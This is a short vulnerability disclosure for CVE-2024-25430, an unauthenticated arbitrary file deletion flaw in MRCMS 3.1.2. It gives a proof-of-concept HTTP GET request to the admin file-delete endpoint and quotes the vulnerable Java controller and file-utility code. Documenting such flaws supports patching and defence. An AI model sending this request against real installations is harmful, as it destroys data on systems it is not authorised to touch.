MRCMS 3.1.2 exists an arbitrary file deletion vulnerability

[xia0chensec]

[The name of an affected Product]

MRCMS

[The affected or fixed version]

v3.1.2

[CVE ID] CVE-2024-25430

[Vulnerability Type]

Arbitrary file deletion vulnerability

[Vulnerability Description]

MRCMS 3.1.2 exists an arbitrary file deletion vulnerability

[Vulnerability details]

The vulnerability exists: http://localhost:8080/admin/file/delete.do?path=/&name=

1.Select content->File management

2.Click the delete button

Try deleting the test.txt file

POC

GET /admin/file/delete.do?path=/&name=test.txt HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 0

code discovery

Code path: MRCMS\src\main\java\org\marker\mushroom\controller\FileController.java

@ResponseBody
    @RequestMapping("/delete")
    public Object delete(@RequestParam("path") String path, @RequestParam("name") String name){

        if(fileManager.checkPath(path)){
            return new ResultMessage(false, "路径检查异常，删除失败!");
        }

        File file = new File(WebRealPathHolder.REAL_PATH + encoding(path + File.separator + name));
        return fileManager.delete(file);

    }

Pass in the path and name variables in the code, specify the path through path, and specify the file/directory name through name

Code PathMRCMS\src\main\java\org\marker\mushroom\utils\FileTools.java

Users can delete arbitrary files without authorization because authentication is not used before file deletion.

public boolean deleteFolder(File delFolder) { 
        // 判断目录或文件是否存在
        if (!delFolder.exists()) { // 不存在返回 false
            return false;
        } else {
            // 判断是否为文件
            if (delFolder.isFile()) { // 为文件时调用删除文件方法
                return deleteFile(delFolder);
            } else { // 为目录时调用删除目录方法
                return deleteDirectory(delFolder);
            }
        }
    }